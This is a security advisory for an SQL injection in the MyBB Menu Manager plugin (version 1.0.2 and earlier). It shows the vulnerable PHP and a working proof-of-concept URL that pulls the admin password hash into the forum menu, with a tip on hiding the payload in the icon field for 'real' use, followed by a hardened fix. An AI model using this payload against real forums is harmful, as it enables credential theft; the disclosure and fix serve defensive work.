MyBB Plugin Menu Manager <= 1.0.2 SQL injection

# Version: 1.0.2

Vulnerable Code
----------------

// Request values are copied from $mybb->input with no escaping or validation.
$title = $mybb->input['title'];
$icon = $mybb->input['icon'];
$link = $mybb->input['link'];
$newwindow = isset($_REQUEST['newwindow']) ? 1 : 0;

if (empty($title))
{
    $errors[] = $lang->menumanager_error_no_title;
}

if (empty($link))
{
    $errors[] = $lang->menumanager_error_no_link;
}

if($errors)
{
    $page->output_inline_error($errors);
}
else
{
    // The raw values are interpolated directly into the SQL string.
    $db->write_query("UPDATE ".TABLE_PREFIX."menumanager
               SET title ='$title', link ='$link' ,icon ='$icon' ,newwindow ='$newwindow'
                WHERE id = $id LIMIT 1
                ");
}

Simple PoC (must be executed by an admin)
-----------------------------------------

http://[site]/admin/index.php?module=config/menumanager&action=edit2&id=1&link=1&title=', title=(SELECT password FROM mybb_users WHERE uid=1), disabled=0, icon='

When executed, just check the index; the result should be in the menu. That's not discreet at all, so if you want to use it for real, use the icon value instead of title for the subquery.

Groucho
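
The PoC works because a single quote in title ends the quoted string and lets the rest of the value append its own SET assignments. The block below is an added example of a hardened edit handler, not code from the plugin or its author. It assumes it runs inside the plugin's admin module with the same $mybb, $db, $lang and $page objects as the vulnerable snippet; the rejection message is constructed.

```php
<?php
// Assumption: MyBB has already set up $mybb, $db, $lang and $page, as in the
// vulnerable snippet above.
$errors = array();

// Integer cast: nothing but a number can reach the WHERE clause.
$id        = (int)$mybb->input['id'];
$title     = $mybb->input['title'];
$icon      = $mybb->input['icon'];
$link      = $mybb->input['link'];
$newwindow = isset($mybb->input['newwindow']) ? 1 : 0;

// Accept the change only as a POST carrying a valid post key, so a link
// opened by a logged-in admin cannot drive the update.
if ($mybb->request_method != 'post' || !verify_post_check($mybb->input['my_post_key'], true))
{
    $errors[] = 'Invalid request.'; // constructed message
}

if (empty($title))
{
    $errors[] = $lang->menumanager_error_no_title;
}

if (empty($link))
{
    $errors[] = $lang->menumanager_error_no_link;
}

if ($errors)
{
    $page->output_inline_error($errors);
}
else
{
    // update_query() wraps each value in quotes but does not escape it,
    // so every string goes through escape_string() first.
    $update = array(
        'title'     => $db->escape_string($title),
        'link'      => $db->escape_string($link),
        'icon'      => $db->escape_string($icon),
        'newwindow' => $newwindow,
    );

    // Arguments: table (TABLE_PREFIX is prepended), values, WHERE, LIMIT.
    $db->update_query('menumanager', $update, "id = {$id}", 1);
}
```

With the values escaped, the PoC's title is stored as a literal string and shows up verbatim in the menu instead of being parsed as SQL.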

